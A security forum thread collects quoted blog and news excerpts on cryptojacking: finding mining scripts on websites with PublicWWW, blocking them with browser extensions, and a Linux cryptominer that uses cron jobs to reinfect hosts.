finding cryptojacking malware with PublicWWW

Antivirus, forensics, intrusion detection, cryptography, etc.
Post Reply
Message
Author
labbe5
Posts: 2159
Joined: Wed 13 Nov 2013, 14:26
Location: Canada

finding cryptojacking malware with PublicWWW

#1 Post by labbe5 »

https://badpackets.net/how-to-find-cryp ... g-malware/

Cryptojacking malware continues to spread across the web, largely due to the popularity of Coinhive. Since Coinhive’s launch in September 2017, numerous cryptojacking clones have come about.

The tool I’ve chosen to locate them with is PublicWWW. This is a search engine that indexes the entire source code of websites.


Further reading :
https://badpackets.net/my-favorite-webs ... -services/
Cryptojacking detection was added to urlscan.io early in January 2018. This enables you check if a website is engaging in malicious cryptocurrency mining, based on known signatures of cryptojacking malware (JavaScript).
https://urlscan.io/
https://sitecheck.sucuri.net/

labbe5
Posts: 2159
Joined: Wed 13 Nov 2013, 14:26
Location: Canada

How to stop cryptojacking

#2 Post by labbe5 »

https://badpackets.net/how-to-stop-cryptojacking/

Cryptojacking is defined as hijacking your desktop/ laptop computer, mobile device, or server to surreptitiously mine cryptocurrency for someone else’s profit. In other words, it’s the theft of computational resources (CPU) and energy (electricity).

Cryptojacking most commonly happens through a web browser. Malicious cryptomining scripts (sometimes referred to as coinminers) are frequently found being injected on compromised websites. Some affected sites have been of well-known organizations and government institutions. Many of the hacked sites found were using vulnerable content management systems or compromised third-party services.

Cryptojacking is typically resource intensive as malicious cryptocurrency mining consumes all CPU resources available. This is because the amount of CPU power used correlates to the speed at which hashes can be generated (mined). The faster hashes are mined, the faster money is made.


Cryptojacking can be stopped by using a browser extension designed to block malicious cryptocurrency mining scripts.

MinerBlock is an addon for Firefox and Chrome.

https://addons.mozilla.org/en-US/firefo ... ock-origin

Further reading :
https://www.guidingtech.com/block-crypt ... ng-firefox

labbe5
Posts: 2159
Joined: Wed 13 Nov 2013, 14:26
Location: Canada

Cryptominer Uses Cron To Reinfect Linux Host After Removal

#3 Post by labbe5 »

https://www.bleepingcomputer.com/news/s ... r-removal/

A cryptomining dropper malware has been spotted by security researchers while gaining persistence on Linux hosts by adding cron jobs to reinfect the compromised machines after being removed.

The malware was initially discovered on a web server with a maxed out CPU by a malicious process, a sure sign of a host infected with cryptomining malware configured to use all available computing resources.

As Sucuri's security analyst Luke Leal found after taking a closer look, the cryptominer is downloaded by attackers using a Bash script dropped on the server via an unknown method — most probably after exploiting an unpatched vulnerability, brute forcing their way in, or by phishing the admin credentials.


Linux targeted with coin miners

The Linux platform is getting more and more attention from cybercriminals as Check Point proved with the discovery of a Backdoor Trojan they dubbed SpeakUp that targets servers running six different Linux distributions to drop XMRig miners.

Another campaign detected by Trend Micro during February deployed the XMR-Stak Cryptonight cryptocurrency miner on Linux machines, at the same time hunting down and killing other Linux malware and coin miners present on computers it compromised.

Also, the Xbash botnet spotted by Palo Alto Networks' Unit 42 in September 2018 comes with self-spreading capabilities and it targets both Linux and Windows servers, combining cryptomining and ransomware capabilities.

Post Reply